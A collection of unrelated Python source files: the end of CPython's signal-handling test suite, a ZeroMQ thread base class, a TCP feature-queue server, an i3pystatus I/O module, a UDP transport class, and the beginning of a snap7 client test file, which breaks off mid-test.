raise AssertionError("%s bytes failed to fill the socketpair "
"buffer" % written)
# By default, we get a warning when a signal arrives
msg = ('Exception ignored when trying to {action} '
'to the signal wakeup fd')
signal.set_wakeup_fd(write.fileno())
with captured_stderr() as err:
_testcapi.raise_signal(signum)
err = err.getvalue()
if msg not in err:
raise AssertionError("first set_wakeup_fd() test failed, "
"stderr: %r" % err)
# And also if warn_on_full_buffer=True
signal.set_wakeup_fd(write.fileno(), warn_on_full_buffer=True)
with captured_stderr() as err:
_testcapi.raise_signal(signum)
err = err.getvalue()
if msg not in err:
raise AssertionError("set_wakeup_fd(warn_on_full_buffer=True) "
"test failed, stderr: %r" % err)
# But not if warn_on_full_buffer=False
signal.set_wakeup_fd(write.fileno(), warn_on_full_buffer=False)
with captured_stderr() as err:
_testcapi.raise_signal(signum)
err = err.getvalue()
if err != "":
raise AssertionError("set_wakeup_fd(warn_on_full_buffer=False) "
"test failed, stderr: %r" % err)
# And then check the default again, to make sure warn_on_full_buffer
# settings don't leak across calls.
signal.set_wakeup_fd(write.fileno())
with captured_stderr() as err:
_testcapi.raise_signal(signum)
err = err.getvalue()
if msg not in err:
raise AssertionError("second set_wakeup_fd() test failed, "
"stderr: %r" % err)
""".format(action=action)
assert_python_ok('-c', code)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class SiginterruptTest(unittest.TestCase):
def readpipe_interrupted(self, interrupt):
"""Perform a read during which a signal will arrive. Return True if the
read is interrupted by the signal and raises an exception. Return False
if it returns normally.
"""
# use a subprocess to have only one thread, to have a timeout on the
# blocking read and to not touch signal handling in this process
code = """if 1:
import errno
import os
import signal
import sys
interrupt = %r
r, w = os.pipe()
def handler(signum, frame):
1 / 0
signal.signal(signal.SIGALRM, handler)
if interrupt is not None:
signal.siginterrupt(signal.SIGALRM, interrupt)
print("ready")
sys.stdout.flush()
# run the test twice
try:
for loop in range(2):
# send a SIGALRM in a second (during the read)
signal.alarm(1)
try:
# blocking call: read from a pipe without data
os.read(r, 1)
except ZeroDivisionError:
pass
else:
sys.exit(2)
sys.exit(3)
finally:
os.close(r)
os.close(w)
""" % (interrupt,)
with spawn_python('-c', code) as process:
try:
# wait until the child process is loaded and has started
first_line = process.stdout.readline()
stdout, stderr = process.communicate(timeout=5.0)
except subprocess.TimeoutExpired:
process.kill()
return False
else:
stdout = first_line + stdout
exitcode = process.wait()
if exitcode not in (2, 3):
raise Exception("Child error (exit code %s): %r"
% (exitcode, stdout))
return (exitcode == 3)
def test_without_siginterrupt(self):
# If a signal handler is installed and siginterrupt is not called
# at all, when that signal arrives, it interrupts a syscall that's in
# progress.
interrupted = self.readpipe_interrupted(None)
self.assertTrue(interrupted)
def test_siginterrupt_on(self):
# If a signal handler is installed and siginterrupt is called with
# a true value for the second argument, when that signal arrives, it
# interrupts a syscall that's in progress.
interrupted = self.readpipe_interrupted(True)
self.assertTrue(interrupted)
def test_siginterrupt_off(self):
# If a signal handler is installed and siginterrupt is called with
# a false value for the second argument, when that signal arrives, it
# does not interrupt a syscall that's in progress.
interrupted = self.readpipe_interrupted(False)
self.assertFalse(interrupted)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class ItimerTest(unittest.TestCase):
def setUp(self):
self.hndl_called = False
self.hndl_count = 0
self.itimer = None
self.old_alarm = signal.signal(signal.SIGALRM, self.sig_alrm)
def tearDown(self):
signal.signal(signal.SIGALRM, self.old_alarm)
if self.itimer is not None: # test_itimer_exc doesn't change this attr
# just ensure that itimer is stopped
signal.setitimer(self.itimer, 0)
def sig_alrm(self, *args):
self.hndl_called = True
def sig_vtalrm(self, *args):
self.hndl_called = True
if self.hndl_count > 3:
# it shouldn't be here, because it should have been disabled.
raise signal.ItimerError("setitimer didn't disable ITIMER_VIRTUAL "
"timer.")
elif self.hndl_count == 3:
# disable ITIMER_VIRTUAL, this function shouldn't be called anymore
signal.setitimer(signal.ITIMER_VIRTUAL, 0)
self.hndl_count += 1
def sig_prof(self, *args):
self.hndl_called = True
signal.setitimer(signal.ITIMER_PROF, 0)
def test_itimer_exc(self):
# XXX I'm assuming -1 is an invalid itimer, but maybe some platform
# defines it ?
self.assertRaises(signal.ItimerError, signal.setitimer, -1, 0)
# Negative times are treated as zero on some platforms.
if 0:
self.assertRaises(signal.ItimerError,
signal.setitimer, signal.ITIMER_REAL, -1)
def test_itimer_real(self):
self.itimer = signal.ITIMER_REAL
signal.setitimer(self.itimer, 1.0)
signal.pause()
self.assertEqual(self.hndl_called, True)
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform in ('netbsd5',),
'itimer not reliable (does not mix well with threading) on some BSDs.')
def test_itimer_virtual(self):
self.itimer = signal.ITIMER_VIRTUAL
signal.signal(signal.SIGVTALRM, self.sig_vtalrm)
signal.setitimer(self.itimer, 0.3, 0.2)
start_time = time.monotonic()
while time.monotonic() - start_time < 60.0:
# use up some virtual time by doing real work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_vtalrm handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# virtual itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
def test_itimer_prof(self):
self.itimer = signal.ITIMER_PROF
signal.signal(signal.SIGPROF, self.sig_prof)
signal.setitimer(self.itimer, 0.2, 0.2)
start_time = time.monotonic()
while time.monotonic() - start_time < 60.0:
# do some work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_prof handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# profiling itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
def test_setitimer_tiny(self):
# bpo-30807: C setitimer() takes a microsecond-resolution interval.
# Check that float -> timeval conversion doesn't round
# the interval down to zero, which would disable the timer.
self.itimer = signal.ITIMER_REAL
signal.setitimer(self.itimer, 1e-6)
time.sleep(1)
self.assertEqual(self.hndl_called, True)
class PendingSignalsTests(unittest.TestCase):
"""
Test pthread_sigmask(), pthread_kill(), sigpending() and sigwait()
functions.
"""
@unittest.skipUnless(hasattr(signal, 'sigpending'),
'need signal.sigpending()')
def test_sigpending_empty(self):
self.assertEqual(signal.sigpending(), set())
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
@unittest.skipUnless(hasattr(signal, 'sigpending'),
'need signal.sigpending()')
def test_sigpending(self):
code = """if 1:
import os
import signal
def handler(signum, frame):
1/0
signum = signal.SIGUSR1
signal.signal(signum, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
os.kill(os.getpid(), signum)
pending = signal.sigpending()
for sig in pending:
assert isinstance(sig, signal.Signals), repr(pending)
if pending != {signum}:
raise Exception('%s != {%s}' % (pending, signum))
try:
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_kill'),
'need signal.pthread_kill()')
def test_pthread_kill(self):
code = """if 1:
import signal
import threading
import sys
signum = signal.SIGUSR1
def handler(signum, frame):
1/0
signal.signal(signum, handler)
tid = threading.get_ident()
try:
signal.pthread_kill(tid, signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def wait_helper(self, blocked, test):
"""
test: body of the "def test(signum):" function.
blocked: number of the blocked signal
"""
code = '''if 1:
import signal
import sys
from signal import Signals
def handler(signum, frame):
1/0
%s
blocked = %s
signum = signal.SIGALRM
# child: block and wait the signal
try:
signal.signal(signum, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, [blocked])
# Do the tests
test(signum)
# The handler must not be called on unblock
try:
signal.pthread_sigmask(signal.SIG_UNBLOCK, [blocked])
except ZeroDivisionError:
print("the signal handler has been called",
file=sys.stderr)
sys.exit(1)
except BaseException as err:
print("error: {}".format(err), file=sys.stderr)
sys.stderr.flush()
sys.exit(1)
''' % (test.strip(), blocked)
# sig*wait* must be called with the signal blocked: since the current
# process might have several threads running, use a subprocess to have
# a single thread.
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'sigwait'),
'need signal.sigwait()')
def test_sigwait(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
received = signal.sigwait([signum])
assert isinstance(received, signal.Signals), received
if received != signum:
raise Exception('received %s, not %s' % (received, signum))
''')
@unittest.skipUnless(hasattr(signal, 'sigwaitinfo'),
'need signal.sigwaitinfo()')
def test_sigwaitinfo(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
info = signal.sigwaitinfo([signum])
if info.si_signo != signum:
raise Exception("info.si_signo != %s" % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
info = signal.sigtimedwait([signum], 10.1000)
if info.si_signo != signum:
raise Exception('info.si_signo != %s' % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_poll(self):
# check that polling with sigtimedwait works
self.wait_helper(signal.SIGALRM, '''
def test(signum):
import os
os.kill(os.getpid(), signum)
info = signal.sigtimedwait([signum], 0)
if info.si_signo != signum:
raise Exception('info.si_signo != %s' % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_timeout(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
received = signal.sigtimedwait([signum], 1.0)
if received is not None:
raise Exception("received=%r" % (received,))
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_negative_timeout(self):
signum = signal.SIGALRM
self.assertRaises(ValueError, signal.sigtimedwait, [signum], -1.0)
@unittest.skipUnless(hasattr(signal, 'sigwait'),
'need signal.sigwait()')
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_sigwait_thread(self):
# Check that calling sigwait() from a thread doesn't suspend the whole
# process. A new interpreter is spawned to avoid problems when mixing
# threads and fork(): only async-safe functions are allowed between
# fork() and exec().
assert_python_ok("-c", """if True:
import os, threading, sys, time, signal
# the default handler terminates the process
signum = signal.SIGUSR1
def kill_later():
# wait until the main thread is waiting in sigwait()
time.sleep(1)
os.kill(os.getpid(), signum)
# the signal must be blocked by all the threads
signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
killer = threading.Thread(target=kill_later)
killer.start()
received = signal.sigwait([signum])
if received != signum:
print("sigwait() received %s, not %s" % (received, signum),
file=sys.stderr)
sys.exit(1)
killer.join()
# unblock the signal, which should have been cleared by sigwait()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
""")
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask_arguments(self):
self.assertRaises(TypeError, signal.pthread_sigmask)
self.assertRaises(TypeError, signal.pthread_sigmask, 1)
self.assertRaises(TypeError, signal.pthread_sigmask, 1, 2, 3)
self.assertRaises(OSError, signal.pthread_sigmask, 1700, [])
with self.assertRaises(ValueError):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.NSIG])
with self.assertRaises(ValueError):
signal.pthread_sigmask(signal.SIG_BLOCK, [0])
with self.assertRaises(ValueError):
signal.pthread_sigmask(signal.SIG_BLOCK, [1<<1000])
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask_valid_signals(self):
s = signal.pthread_sigmask(signal.SIG_BLOCK, signal.valid_signals())
self.addCleanup(signal.pthread_sigmask, signal.SIG_SETMASK, s)
# Get current blocked set
s = signal.pthread_sigmask(signal.SIG_UNBLOCK, signal.valid_signals())
self.assertLessEqual(s, signal.valid_signals())
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask(self):
code = """if 1:
import signal
import os; import threading
def handler(signum, frame):
1/0
def kill(signum):
os.kill(os.getpid(), signum)
def check_mask(mask):
for sig in mask:
assert isinstance(sig, signal.Signals), repr(sig)
def read_sigmask():
sigmask = signal.pthread_sigmask(signal.SIG_BLOCK, [])
check_mask(sigmask)
return sigmask
signum = signal.SIGUSR1
# Install our signal handler
old_handler = signal.signal(signum, handler)
# Unblock SIGUSR1 (and copy the old mask) to test our signal handler
old_mask = signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
check_mask(old_mask)
try:
kill(signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
# Block and then raise SIGUSR1. The signal is blocked: the signal
# handler is not called, and the signal is now pending
mask = signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
check_mask(mask)
kill(signum)
# Check the new mask
blocked = read_sigmask()
check_mask(blocked)
if signum not in blocked:
raise Exception("%s not in %s" % (signum, blocked))
if old_mask ^ blocked != {signum}:
raise Exception("%s ^ %s != {%s}" % (old_mask, blocked, signum))
# Unblock SIGUSR1
try:
# unblock the pending signal calls immediately the signal handler
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
try:
kill(signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
# Check the new mask
unblocked = read_sigmask()
if signum in unblocked:
raise Exception("%s in %s" % (signum, unblocked))
if blocked ^ unblocked != {signum}:
raise Exception("%s ^ %s != {%s}" % (blocked, unblocked, signum))
if old_mask != unblocked:
raise Exception("%s != %s" % (old_mask, unblocked))
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_kill'),
'need signal.pthread_kill()')
def test_pthread_kill_main_thread(self):
# Test that a signal can be sent to the main thread with pthread_kill()
# before any other thread has been created (see issue #12392).
code = """if True:
import threading
import signal
import sys
def handler(signum, frame):
sys.exit(3)
signal.signal(signal.SIGUSR1, handler)
signal.pthread_kill(threading.get_ident(), signal.SIGUSR1)
sys.exit(2)
"""
with spawn_python('-c', code) as process:
stdout, stderr = process.communicate()
exitcode = process.wait()
if exitcode != 3:
raise Exception("Child error (exit code %s): %s" %
(exitcode, stdout))
class StressTest(unittest.TestCase):
"""
Stress signal delivery, especially when a signal arrives in
the middle of recomputing the signal state or executing
previously tripped signal handlers.
"""
def setsig(self, signum, handler):
old_handler = signal.signal(signum, handler)
self.addCleanup(signal.signal, signum, old_handler)
def measure_itimer_resolution(self):
N = 20
times = []
def handler(signum=None, frame=None):
if len(times) < N:
times.append(time.perf_counter())
# 1 µs is the smallest possible timer interval,
# we want to measure what the concrete duration
# will be on this platform
signal.setitimer(signal.ITIMER_REAL, 1e-6)
self.addCleanup(signal.setitimer, signal.ITIMER_REAL, 0)
self.setsig(signal.SIGALRM, handler)
handler()
while len(times) < N:
time.sleep(1e-3)
durations = [times[i+1] - times[i] for i in range(len(times) - 1)]
med = statistics.median(durations)
if support.verbose:
print("detected median itimer() resolution: %.6f s." % (med,))
return med
def decide_itimer_count(self):
# Some systems have poor setitimer() resolution (for example
# measured around 20 ms. on FreeBSD 9), so decide on a reasonable
# number of sequential timers based on that.
reso = self.measure_itimer_resolution()
if reso <= 1e-4:
return 10000
elif reso <= 1e-2:
return 100
else:
self.skipTest("detected itimer resolution (%.3f s.) too high "
"(> 10 ms.) on this platform (or system too busy)"
% (reso,))
@unittest.skipUnless(hasattr(signal, "setitimer"),
"test needs setitimer()")
def test_stress_delivery_dependent(self):
"""
This test uses dependent signal handlers.
"""
N = self.decide_itimer_count()
sigs = []
def first_handler(signum, frame):
# 1e-6 is the minimum non-zero value for `setitimer()`.
# Choose a random delay so as to improve chances of
# triggering a race condition. Ideally the signal is received
# when inside critical signal-handling routines such as
# Py_MakePendingCalls().
signal.setitimer(signal.ITIMER_REAL, 1e-6 + random.random() * 1e-5)
def second_handler(signum=None, frame=None):
sigs.append(signum)
# Here on Linux, SIGPROF > SIGALRM > SIGUSR1. By using both
# ascending and descending sequences (SIGUSR1 then SIGALRM,
# SIGPROF then SIGALRM), we maximize chances of hitting a bug.
self.setsig(signal.SIGPROF, first_handler)
self.setsig(signal.SIGUSR1, first_handler)
self.setsig(signal.SIGALRM, second_handler) # for ITIMER_REAL
expected_sigs = 0
deadline = time.monotonic() + 15.0
while expected_sigs < N:
os.kill(os.getpid(), signal.SIGPROF)
expected_sigs += 1
# Wait for handlers to run to avoid signal coalescing
while len(sigs) < expected_sigs and time.monotonic() < deadline:
time.sleep(1e-5)
os.kill(os.getpid(), signal.SIGUSR1)
expected_sigs += 1
while len(sigs) < expected_sigs and time.monotonic() < deadline:
time.sleep(1e-5)
# All ITIMER_REAL signals should have been delivered to the
# Python handler
self.assertEqual(len(sigs), N, "Some signals were lost")
@unittest.skipUnless(hasattr(signal, "setitimer"),
"test needs setitimer()")
def test_stress_delivery_simultaneous(self):
"""
This test uses simultaneous signal handlers.
"""
N = self.decide_itimer_count()
sigs = []
def handler(signum, frame):
sigs.append(signum)
self.setsig(signal.SIGUSR1, handler)
self.setsig(signal.SIGALRM, handler) # for ITIMER_REAL
expected_sigs = 0
deadline = time.monotonic() + 15.0
while expected_sigs < N:
# Hopefully the SIGALRM will be received somewhere during
# initial processing of SIGUSR1.
signal.setitimer(signal.ITIMER_REAL, 1e-6 + random.random() * 1e-5)
os.kill(os.getpid(), signal.SIGUSR1)
expected_sigs += 2
# Wait for handlers to run to avoid signal coalescing
while len(sigs) < expected_sigs and time.monotonic() < deadline:
time.sleep(1e-5)
# All ITIMER_REAL signals should have been delivered to the
# Python handler
self.assertEqual(len(sigs), N, "Some signals were lost")
def tearDownModule():
support.reap_children()
if __name__ == "__main__":
unittest.main()
|
_base.py
|
# pylint: disable=missing-docstring
# pylint: enable=missing-docstring
# Copyright 2018 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import uuid
import zmq
LOGGER = logging.getLogger(__name__)
class Base:
"""
Base class for running a ZeroMQ event loop in a background thread with a PAIR channel for
cancelling the background thread.
Parameters
----------
start : bool
Whether to start the event loop as a background thread.
"""
def __init__(self, start):
self._thread = None
self._cancel_address = f'inproc://{uuid.uuid4().hex}'
self._cancel_parent = zmq.Context.instance().socket(zmq.PAIR) # pylint: disable=E1101
self._cancel_parent.bind(self._cancel_address)
if start:
self.run_async()
STATUS = {
'ok': b'\x00',
'end': b'\x01',
'error': b'\x02',
'timeout': b'\x03',
'serialization_error': b'\x04',
}
STATUS.update({value: key for key, value in STATUS.items()})
def __enter__(self):
self.run_async()
return self
def __exit__(self, *_):
self.cancel()
@property
def is_alive(self):
"""
bool : Whether the background thread is alive.
"""
return self._thread and self._thread.is_alive()
def cancel(self, timeout=None):
"""
Cancel the event loop running in a background thread.
Parameters
----------
timeout : float
Timeout for joining the background thread.
Returns
-------
cancelled : bool
Whether the background thread was cancelled. `False` if the background thread was not
running.
"""
if self.is_alive:
self._cancel_parent.send_multipart([b''])
self._thread.join(timeout)
self._cancel_parent.close()
return True
return False
def run_async(self):
"""
Run the event loop in a background thread.
"""
if not self.is_alive:
self._thread = threading.Thread(target=self.run, daemon=True)
self._thread.start()
return self._thread
def run(self):
"""
Run the event loop.
Notes
-----
This call is blocking.
"""
raise NotImplementedError
|
featurequeue.py
|
import json
import queue
import socketserver
import threading
import time
import sys
sys.path.append(".")
import ai.common
import ai.feature
class TCPMessageHandler(socketserver.StreamRequestHandler):
def handle(self):
self.data = self.rfile.readline().strip()
self.feature = ai.feature.Feature.from_json(self.data)
#print("{} wrote:".format(self.client_address[0]))
#print(self.feature.to_json())
FeatureQueue.put(self.feature)
self.wfile.write(bytes("OK: " + self.feature.to_json(), "utf-8"))
class FeatureQueue():
feature_queue = queue.PriorityQueue(maxsize=100)
@staticmethod
def start_server_sync():
print("Binding address...")
while True:
try:
server = socketserver.TCPServer((ai.common.HOST, ai.common.PORT), TCPMessageHandler)
break
except:
time.sleep(1)
continue
print("Starting server")
try:
server.serve_forever()
finally:
print("Closing server")
server.server_close()
@staticmethod
def start_server():
thread = threading.Thread(target=FeatureQueue.start_server_sync)
thread.start()
@classmethod
def put(cls, feature):
if cls.feature_queue.full():
cls.feature_queue.queue.pop()
cls.feature_queue.put((feature.type, feature), block=False)
@classmethod
def get(cls):
return cls.feature_queue.get(block=False)
if __name__ == "__main__":
FeatureQueue.start_server()
print("Server started")
|
io.py
|
import json
import signal
import sys
from contextlib import contextmanager
from threading import Condition
from threading import Thread
class IOHandler:
def __init__(self, inp=sys.stdin, out=sys.stdout):
self.inp = inp
self.out = out
def write_line(self, message):
"""Unbuffered printing to stdout."""
self.out.write(message + "\n")
self.out.flush()
def read(self):
"""Iterate over all input lines (Generator)"""
while True:
try:
yield self.read_line()
except EOFError:
return
def read_line(self):
"""
Interrupted respecting reader for stdin.
Raises EOFError if the end of stream has been reached
"""
try:
line = self.inp.readline().strip()
except KeyboardInterrupt:
raise EOFError()
# i3status sends EOF, or an empty line
if not line:
raise EOFError()
return line
class StandaloneIO(IOHandler):
"""
I/O handler for standalone usage of i3pystatus (w/o i3status)
Writing works as usual, but reading will always return a empty JSON array,
and the i3bar protocol header
"""
n = -1
proto = [
{"version": 1, "click_events": True}, "[", "[]", ",[]",
]
def __init__(self, click_events, modules, interval=1):
"""
StandaloneIO instance must be created in main thread to be able to set
the SIGUSR1 signal handler.
"""
super().__init__()
self.interval = interval
self.modules = modules
self.proto[0]['click_events'] = click_events
self.proto[0] = json.dumps(self.proto[0])
self.refresh_cond = Condition()
self.treshold_interval = 20.0
signal.signal(signal.SIGUSR1, self.refresh_signal_handler)
def read(self):
self.compute_treshold_interval()
self.refresh_cond.acquire()
while True:
try:
self.refresh_cond.wait(timeout=self.interval)
except KeyboardInterrupt:
self.refresh_cond.release()
return
yield self.read_line()
def read_line(self):
self.n += 1
return self.proto[min(self.n, len(self.proto) - 1)]
def compute_treshold_interval(self):
"""
Current method is to compute average from all intervals.
"""
intervals = [m.interval for m in self.modules if hasattr(m, "interval")]
if len(intervals) > 0:
self.treshold_interval = round(sum(intervals) / len(intervals))
def async_refresh(self):
"""
Calling this method will send the status line to i3bar immediately
without waiting for timeout (1s by default).
"""
self.refresh_cond.acquire()
self.refresh_cond.notify()
self.refresh_cond.release()
def refresh_signal_handler(self, signo, frame):
"""
This callback is called when SIGUSR1 signal is received.
It updates outputs of all modules by calling their `run` method.
Interval modules are updated in separate threads if their interval is
above a certain treshold value.
This treshold is computed by :func:`compute_treshold_interval` class
method.
The reasoning is that modules with larger intervals also usually take
longer to refresh their output and that their output is not required in
'real time'.
This also prevents possible lag when updating all modules in a row.
"""
if signo != signal.SIGUSR1:
return
for module in self.modules:
if hasattr(module, "interval"):
if module.interval > self.treshold_interval:
thread = Thread(target=module.run)
thread.start()
else:
module.run()
else:
module.run()
self.async_refresh()
class JSONIO:
def __init__(self, io, skiplines=2):
self.io = io
for i in range(skiplines):
self.io.write_line(self.io.read_line())
def read(self):
"""Iterate over all JSON input (Generator)"""
for line in self.io.read():
with self.parse_line(line) as j:
yield j
@contextmanager
def parse_line(self, line):
"""Parse a single line of JSON and write modified JSON back."""
prefix = ""
# ignore comma at start of lines
if line.startswith(","):
line, prefix = line[1:], ","
j = json.loads(line)
yield j
self.io.write_line(prefix + json.dumps(j))
|
transport.py
|
import traceback, sys
from socket import socket as Socket, error as SocketError, AF_INET, SOCK_DGRAM
from threading import Thread, Event, Lock
from struct import unpack, pack_into
from sys import exc_info
from config import *
ITEM_SIZE_IN_BYTES = 8
SENSORS_CALIBRATED_VAR = 100
class Transport:
def __init__(self, nDataItemsCount):
self.receiverStopped = Event() # Create event
self.receiverStopped.set() # Set event up
self.cbkLock = Lock()
self.threadKill = Event()
self.socketIN = None
self.socketOUT = None
self.nDataItemsCount = nDataItemsCount
self.mapReceivedCbk = {}
def registerCallback(self, cbkOwner, cbk):
self.cbkLock.acquire(True)
try:
self.mapReceivedCbk[cbkOwner] = cbk
finally:
self.cbkLock.release()
def unRegisterCallback(self, cbkOwner):
self.cbkLock.acquire(True)
try:
self.mapReceivedCbk.pop(cbkOwner, None)
finally:
self.cbkLock.release()
def doConnect(self, client, server):
bRet = False
try:
self.socketOUT = Socket(AF_INET, SOCK_DGRAM)
self.socketOUT.connect(server)
self.socketIN = Socket(AF_INET, SOCK_DGRAM)
self.socketIN.bind(client)
bRet = True
self.threadKill.clear()
receiver = Thread(target = self.receiverMain, args = (self,))
receiver.daemon = True
receiver.setName("RecvThread")
receiver.start()
except SocketError:
pass
return bRet
def doSend(self, lstValues):
nSent = 0
if None != self.socketOUT:
packetData = bytearray(lstValues.__len__() * ITEM_SIZE_IN_BYTES)
nOffset = 0
for strValue in lstValues:
print "Sending Value:" + str(strValue)
pack_into('>d', packetData, nOffset, float(strValue))
nOffset += ITEM_SIZE_IN_BYTES
nSent = self.socketOUT.send(packetData)
return nSent
def doDisconnect(self):
self.threadKill.set()
while not self.receiverStopped.wait(1):
pass
bRet = False
if None != self.socketOUT:
self.socketOUT.close()
self.socketOUT = None
bRet = True
if None != self.socketIN:
self.socketIN.close()
self.socketIN = None
bRet = True
return bRet
def flushSocket(self):
while 1:
try:
PacketBytes = self.socketIN.recv(ITEM_SIZE_IN_BYTES * self.nDataItemsCount * 10)
except:
break
def receiverMain(self, kwArgs): # Data exchange and make send and receive for PID
self.receiverStopped.clear()
self.socketIN.setblocking(0)
while not self.threadKill.wait(1.0 / MAX_FRAMES_PER_SEC_TO_RECEIVE):
if None != self.socketIN:
nBufferLen = ITEM_SIZE_IN_BYTES * self.nDataItemsCount
buffer = bytearray(nBufferLen)
try:
# Try to read date from socket to buffer
lstServerData = []
self.socketIN.recv_into(buffer, nBufferLen)
# Remove all data waiting in the socket, since server can send data more frequently than we read it
self.flushSocket()
# Unpacking data from buffer and adding data in lstServerData
for i in range(self.nDataItemsCount):
dataItem = unpack('>d', buffer[i * ITEM_SIZE_IN_BYTES: (i + 1) * ITEM_SIZE_IN_BYTES])
lstServerData.append(dataItem[0] * SENSORS_CALIBRATED_VAR) # REMOVE WHEN ACTUATORS CALIBRATED * 100
# Notify UI
self.cbkLock.acquire(True)
try:
for cbk in self.mapReceivedCbk.values():
try:
cbk(lstServerData)
except:
print "Failed to execute callback!"
traceback.print_exc(file=sys.stdout)
finally:
self.cbkLock.release()
except SocketError as e:
pass
self.receiverStopped.set()
|
test_client.py
|
import ctypes
import gc
import logging
import struct
import time
import unittest
import platform
from datetime import datetime, timedelta, date
from multiprocessing import Process
from unittest import mock
import snap7
from snap7 import util
from snap7.exceptions import Snap7Exception
from snap7.common import check_error
from snap7.server import mainloop
from snap7.types import S7AreaDB, S7WLByte, S7DataItem, S7SZL, S7SZLList, buffer_type, buffer_size, S7Object, Areas, WordLen
logging.basicConfig(level=logging.WARNING)
ip = '127.0.0.1'
tcpport = 1102
db_number = 1
rack = 1
slot = 1
class TestClient(unittest.TestCase):
process = None
@classmethod
def setUpClass(cls):
cls.process = Process(target=mainloop)
cls.process.start()
time.sleep(2) # wait for server to start
@classmethod
def tearDownClass(cls):
cls.process.terminate()
cls.process.join(1)
if cls.process.is_alive():
cls.process.kill()
def setUp(self):
self.client = snap7.client.Client()
self.client.connect(ip, rack, slot, tcpport)
def tearDown(self):
self.client.disconnect()
self.client.destroy()
def _as_check_loop(self, check_times=20) -> int:
check_status = ctypes.c_int(-1)
# preparing Server values
for i in range(check_times):
self.client.check_as_completion(ctypes.byref(check_status))
if check_status.value == 0:
break
time.sleep(0.5)
else:
raise Snap7Exception(f"Async Request not finished after {check_times} times - Fail")
return check_status.value
def test_db_read(self):
size = 40
start = 0
db = 1
data = bytearray(40)
self.client.db_write(db_number=db, start=start, data=data)
result = self.client.db_read(db_number=db, start=start, size=size)
self.assertEqual(data, result)
def test_db_write(self):
size = 40
data = bytearray(size)
self.client.db_write(db_number=1, start=0, data=data)
def test_db_get(self):
self.client.db_get(db_number=db_number)
def test_read_multi_vars(self):
db = 1
# build and write test values
test_value_1 = 129.5
test_bytes_1 = bytearray(struct.pack('>f', test_value_1))
self.client.db_write(db, 0, test_bytes_1)
test_value_2 = -129.5
test_bytes_2 = bytearray(struct.pack('>f', test_value_2))
self.client.db_write(db, 4, test_bytes_2)
test_value_3 = 123
test_bytes_3 = bytearray([0, 0])
util.set_int(test_bytes_3, 0, test_value_3)
self.client.db_write(db, 8, test_bytes_3)
test_values = [test_value_1, test_value_2, test_value_3]
# build up our requests
data_items = (S7DataItem * 3)()
data_items[0].Area = ctypes.c_int32(S7AreaDB)
data_items[0].WordLen = ctypes.c_int32(WordLen.Byte.value)
data_items[0].Result = ctypes.c_int32(0)
data_items[0].DBNumber = ctypes.c_int32(db)
data_items[0].Start = ctypes.c_int32(0)
data_items[0].Amount = ctypes.c_int32(4) # reading a REAL, 4 bytes
data_items[1].Area = ctypes.c_int32(S7AreaDB)
